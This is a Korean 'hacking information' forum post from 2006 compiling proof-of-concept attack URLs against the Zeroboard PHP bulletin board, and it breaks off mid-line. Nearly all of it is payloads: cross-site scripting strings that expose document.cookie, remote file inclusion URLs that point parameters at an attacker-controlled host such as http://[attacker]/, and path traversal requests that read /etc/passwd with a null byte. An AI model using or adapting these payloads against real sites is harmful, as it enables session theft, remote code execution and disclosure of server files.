해킹정보


게시글 '제로보드 취약점 총정리'에 대한 정보
제로보드 취약점 총정리
등록일 2006-09-25 조회 49,851
■ 크로스사이트 스크립팅 취약점(2005.02.19) The following proof of concept examples are available: http://www.example.com/zboard.php?id=gallery&sn1=ALBANIAN%20RULEZ='%3E% 3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/zboard.php? id=union_schdule&year=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert (document.cookie)%3C/script%3E http://www.example.com/skin/dir/view_image.php? filename=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert(document.cookie)% 3C/script%3E http://www.example.com/zboard.php?id=link&page=ALBANIAN% 20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E ■ Print_Category.PHP 원격 File Include 취약점(2005.01.13) http://www.example.com/[zeroboard]/include/print_category.php?setup[use_category]=1&dir=http://[attacker]/ ■ DIR 파라미터 원격 File Include 취약점(2005.01.13) The following proof of concept examples are available: http://www.example.com/skin/zero_vote/error.php?dir=http://[ATTACKER] http://www.example.com/skin/zero_vote/login.php?dir=http://[attacker]/ http://www.example.com/skin/zero_vote/setup.php?dir=http://[attacker]/ http://www.example.com/skin/zero_vote/ask_password.php?dir=http://[attacker]/ ■ 다중 File Disclosure 취약점(2005.01.13) http://www.example.com/_head.php?_zb_path=../../../../../etc/passwd%00 http://www.example.com/include/write.php?dir=../../../../../etc/passwd%00 http://www.example.com/outlogin.php?_zb_path=../../../../../etc/passwd%00 ■ 다중원격 스크립트 삽입과 크로스사이트 스크립팅 취약점(2004.12.24) http://www.example.com/outlogin.php?_zb_path=ftp://[attacker]/pub/ http://www.example.com/include/write.php?dir=http://[attacker]/ http://www.example.com/check_user_id.php?user_id=